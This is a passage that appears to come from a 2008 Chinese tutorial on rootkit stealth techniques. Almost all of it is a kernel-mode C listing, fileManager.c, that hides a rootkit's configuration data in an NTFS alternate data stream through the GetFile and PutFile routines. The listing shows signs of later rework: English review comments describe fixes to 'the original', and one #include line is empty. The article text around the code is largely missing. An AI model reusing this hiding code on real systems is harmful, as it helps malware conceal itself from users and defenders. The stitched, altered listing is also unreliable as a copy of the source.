Rootkit隐形技术入门
作者: 宇文, 出处:51CTO.com , 责任编辑: 韩博颖,
2008-03-24 09:28
在安全界,rootkit已越来越引起人们的关注,而rootkit技术的过人之处就在于它的隐形技术,本文旨在向读者打开一扇通向rootkit隐形技术的大门。
在 FileManager.h 文件中,我们把交换数据流所在的位置定义为 MASTER_FILE,同时声明了 GetFile 和 PutFile 两个函数。这两个函数在上面的 configManager.c 中已经用到,在下面对配置文件实现隐形的代码中也会大有用处。需要注意的是,不带路径的文件名会被映射为 MASTER_FILE 的 NTFS 备用数据流(ADS),这正是把配置数据藏起来的手段:
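// fileManager.c
//
// Storing or fetching the exchanged data stream against MASTER_FILE needs no
// path: a bare name is mapped onto an NTFS alternate data stream (ADS) of
// MASTER_FILE. Storing or fetching against the visible file system needs an
// absolute NT path instead (any name containing a backslash is taken verbatim).
//
// Both routines call the kernel-mode Zw* file API synchronously, so they must
// run at PASSIVE_LEVEL — TODO confirm every caller does (the original code does
// not state it).
#include "ntddk.h"
// NOTE(review): the target of this #include was lost when the listing was
// extracted; restore it from the original source (it presumably declares
// _snprintf / _snwprintf).
#include
#include "fileManager.h"
#include "Invisible.h"

// Capacity, in characters, of the on-stack object-name buffer.
#define FM_NAME_CHARS 256

/*
 * Build the NT object name that is actually opened for `filename`.
 *
 * A name without a backslash becomes "<MASTER_FILE>:<name>", i.e. an ADS of
 * MASTER_FILE; anything else is copied as an absolute path.
 *
 * The original used an unbounded wcscpy() into a 256-character stack buffer,
 * so a long caller-supplied name overflowed the stack, and relied on
 * _snwprintf(), which does not NUL-terminate on truncation. Here the copy is
 * bounded, the buffer is always terminated, and a name that does not fit is
 * rejected instead of being silently truncated (a truncated path would open a
 * different object than the one requested).
 *
 * ADSName       Output buffer of `ADSNameChars` characters.
 * ADSNameChars  Capacity of `ADSName` in characters (must be >= 1).
 * filename      Caller-supplied name or absolute path.
 *
 * Returns STATUS_SUCCESS, or STATUS_UNSUCCESSFUL when the name does not fit.
 */
static NTSTATUS BuildStreamName( WCHAR* ADSName, ULONG ADSNameChars, WCHAR* filename )
{
    int written;

    if( wcschr( filename, L'\\' ) == NULL )
        written = _snwprintf( ADSName, ADSNameChars - 1, L"%s:%s", MASTER_FILE, filename );
    else
        written = _snwprintf( ADSName, ADSNameChars - 1, L"%s", filename );

    // _snwprintf() leaves the buffer unterminated when the output fills it.
    ADSName[ADSNameChars - 1] = L'\0';

    // Microsoft's _snwprintf() returns a negative value when the output did
    // not fit in the given count.
    if( written < 0 )
        return( STATUS_UNSUCCESSFUL );
    return( STATUS_SUCCESS );
}

/*
 * Log a failed Zw* call: which call, its NTSTATUS, and the I/O status block
 * it filled in. The format strings are literals — the original passed a
 * formatted buffer as DbgPrint's format argument, which is the classic
 * format-string hazard even when the content happens to be fixed.
 */
static void LogNtFailure( const CHAR* where, NTSTATUS rc, IO_STATUS_BLOCK* ioStatusBlock )
{
    DbgPrint( "comint16: %s failed.\n", where );
    DbgPrint( "comint16: rc = %0x, status = %0x\n", rc, ioStatusBlock->Status );
}

/*
 * Read the contents of `filename` into a caller-supplied buffer.
 *
 * filename     Bare stream name (read from the ADS of MASTER_FILE) or an
 *              absolute NT path.
 * buffer       Destination. At most `buffersize` bytes are written; the data is
 *              not NUL-terminated by this routine, so callers must rely on
 *              *fileSizePtr rather than treating `buffer` as a C string.
 * buffersize   Capacity of `buffer` in bytes. A larger file is read only up to
 *              this many bytes; the only hint of truncation is
 *              *fileSizePtr == buffersize.
 * fileSizePtr  Receives the number of bytes actually read; 0 on failure.
 *
 * Returns STATUS_SUCCESS, or STATUS_UNSUCCESSFUL after logging with DbgPrint
 * (STATUS_INVALID_PARAMETER for NULL arguments).
 * As in the original, any status other than STATUS_SUCCESS from ZwReadFile is
 * treated as a failure, which includes STATUS_END_OF_FILE for an empty file —
 * TODO confirm callers expect that.
 *
 * Fixes relative to the original: the handle is now closed when ZwReadFile
 * fails (it was leaked), the name copy is bounded (see BuildStreamName), the
 * open asks only for the access it needs, and the handle is a kernel handle so
 * it is not exposed through the current process's handle table.
 */
NTSTATUS GetFile( WCHAR* filename, CHAR* buffer, ULONG buffersize, PULONG fileSizePtr )
{
    NTSTATUS rc;
    WCHAR ADSName[FM_NAME_CHARS];
    HANDLE hStream = NULL;
    OBJECT_ATTRIBUTES ObjectAttr;
    UNICODE_STRING FileName;
    IO_STATUS_BLOCK ioStatusBlock = { 0 };

    if( fileSizePtr == NULL )
        return( STATUS_INVALID_PARAMETER );
    *fileSizePtr = 0;
    if( filename == NULL || buffer == NULL )
        return( STATUS_INVALID_PARAMETER );

    if( BuildStreamName( ADSName, FM_NAME_CHARS, filename ) != STATUS_SUCCESS )
    {
        DbgPrint( "comint16: GetFile() file name too long.\n" );
        return( STATUS_UNSUCCESSFUL );
    }

    RtlInitUnicodeString( &FileName, ADSName );
    // OBJ_KERNEL_HANDLE keeps the handle out of the current process's handle
    // table, so user mode cannot reach or close it while we use it.
    InitializeObjectAttributes( &ObjectAttr, &FileName,
                                OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL );

    // Least privilege: this routine only reads. The original requested
    // GENERIC_ALL, which also fails on streams the caller may read but not own.
    rc = ZwOpenFile( &hStream, SYNCHRONIZE | GENERIC_READ, &ObjectAttr, &ioStatusBlock,
                     FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_SYNCHRONOUS_IO_NONALERT );
    if( rc != STATUS_SUCCESS )
    {
        LogNtFailure( "GetFile() ZwOpenFile()", rc, &ioStatusBlock );
        return( STATUS_UNSUCCESSFUL );
    }

    rc = ZwReadFile( hStream, NULL, NULL, NULL, &ioStatusBlock, buffer, buffersize, NULL, NULL );
    if( rc != STATUS_SUCCESS )
    {
        LogNtFailure( "GetFile() ZwReadFile()", rc, &ioStatusBlock );
        ZwClose( hStream );   // the original returned here without closing
        return( STATUS_UNSUCCESSFUL );
    }

    // On success, Information holds the number of bytes transferred.
    *fileSizePtr = (ULONG)ioStatusBlock.Information;
    ZwClose( hStream );
    return( STATUS_SUCCESS );
}

/*
 * Write `buffersize` bytes from `buffer` to `filename`, creating the target or
 * overwriting it if it already exists (FILE_OVERWRITE_IF).
 *
 * filename    Bare stream name (written to the ADS of MASTER_FILE) or an
 *             absolute NT path.
 * buffer      Source bytes; may be NULL only when `buffersize` is 0.
 * buffersize  Number of bytes to write.
 *
 * Returns STATUS_SUCCESS, or STATUS_UNSUCCESSFUL after logging with DbgPrint
 * (STATUS_INVALID_PARAMETER for NULL arguments). A short write is reported as
 * a failure: the original ignored the transferred count, so a partially
 * written (truncated) file could be left behind with a success status.
 *
 * The target is opened with FILE_SHARE_READ | FILE_SHARE_WRITE as in the
 * original, so a concurrent writer is not excluded — TODO confirm that is
 * intended.
 */
NTSTATUS PutFile( WCHAR* filename, CHAR* buffer, ULONG buffersize )
{
    NTSTATUS rc;
    WCHAR ADSName[FM_NAME_CHARS];
    HANDLE hStream = NULL;
    OBJECT_ATTRIBUTES ObjectAttr;
    UNICODE_STRING FileName;
    IO_STATUS_BLOCK ioStatusBlock = { 0 };

    if( filename == NULL || ( buffer == NULL && buffersize != 0 ) )
        return( STATUS_INVALID_PARAMETER );

    if( BuildStreamName( ADSName, FM_NAME_CHARS, filename ) != STATUS_SUCCESS )
    {
        DbgPrint( "comint16: PutFile() file name too long.\n" );
        return( STATUS_UNSUCCESSFUL );
    }

    RtlInitUnicodeString( &FileName, ADSName );
    // Kernel handle: not visible in the current process's handle table.
    InitializeObjectAttributes( &ObjectAttr, &FileName,
                                OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL );

    // Least privilege: only write access is needed (the original asked for
    // GENERIC_ALL).
    rc = ZwCreateFile( &hStream, SYNCHRONIZE | GENERIC_WRITE, &ObjectAttr, &ioStatusBlock,
                       NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ | FILE_SHARE_WRITE,
                       FILE_OVERWRITE_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0 );
    if( rc != STATUS_SUCCESS )
    {
        LogNtFailure( "PutFile() ZwCreateFile()", rc, &ioStatusBlock );
        return( STATUS_UNSUCCESSFUL );
    }

    rc = ZwWriteFile( hStream, NULL, NULL, NULL, &ioStatusBlock, buffer, buffersize, NULL, NULL );
    if( rc != STATUS_SUCCESS )
    {
        LogNtFailure( "PutFile() ZwWriteFile()", rc, &ioStatusBlock );
        ZwClose( hStream );
        return( STATUS_UNSUCCESSFUL );
    }

    // Information holds the number of bytes actually written; anything less
    // than requested means the file on disk is now truncated.
    if( ioStatusBlock.Information != buffersize )
    {
        DbgPrint( "comint16: PutFile() short write: %lu of %lu bytes.\n",
                  (ULONG)ioStatusBlock.Information, buffersize );
        ZwClose( hStream );
        return( STATUS_UNSUCCESSFUL );
    }

    ZwClose( hStream );
    return( STATUS_SUCCESS );
}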

